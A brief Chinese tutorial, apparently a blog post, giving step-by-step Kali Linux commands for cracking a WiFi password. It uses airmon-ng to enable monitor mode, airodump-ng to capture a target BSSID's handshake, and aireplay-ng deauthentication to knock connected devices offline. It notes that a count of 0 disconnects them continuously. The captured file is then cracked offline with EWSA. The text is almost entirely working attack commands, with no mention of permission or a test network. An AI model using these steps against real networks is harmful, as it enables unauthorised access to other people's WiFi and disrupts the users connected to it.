首先kali下必须有无线网卡,可以在笔记本上启动,也可以外接usb无线网卡
把kali刻录到u盘启动了以后,打开终端。
输入 airmon-ng
这条命令会列出支持破解wifi的网卡,如果你没有列出任何东西的话,那就是你的网卡不支持。
接着输入 ifconfig
显示你的网络配置,找到网卡的名称,一般都是wlan0 红框所在位置
airmon-ng start wlan0
这个命令的意思是将wlan0网卡设置为监听模式
再输入 ifconfig
看一下网卡名称是不是还是wlan0
接着输入airmon-ng wlan0
扫描无线网络,注意wlan0这是网卡的名称,在开启监听模式之后可能会变成wlan0mon,根据自己的实际情况输入。
主要关注红框里面的两个值bssid 和 ch 这两个值下一步会用到的
接下来,再打开一个终端
airodump-ng -w Ciscotest -c 1 --bssid D8:24:BD:2F:C5:50 wlan0
抓取握手包
-w Ciscotest
保存握手包名为Ciscotest 在/root/目录下
-c 1
信道为1 也就是前面一步中的ch项的值
--bssid D8:24:BD:2F:C5:50
获取bssid为 D8:24:BD:2F:C5:50的握手包
wlan0
使用wlan0进行获取
命令执行之后就进入了抓包状态。
但是握手包是需要在那个wifi上有设备连接上去,才会产生握手包。
如果被动的等待设备的连接,那太浪费时间了
我们可以用命令来使连接上的设备断开后重新连接获取握手包。
重新再开一个终端
aireplay-ng -0 20 -a D8:24:BD:2F:C5:50 wlan0
-0为模式中的一种:冲突攻击模式,后面跟发送次数(设置为0,则为循环攻击,不停的断开连接,客户端无法正常上网,-a 指定无线AP的mac地址,即为该无线网的bssid值,wlan0 你的无线设备)
一般发送20次就可以让设备断开再重新链接了
如果不行可以再发送几次。
一直到抓包的窗口出现红框中的字样就是抓到握手包。
找到文件夹下的.cap结尾的握手包,复制到U盘上面。
在window下使用ewsa来进行跑包
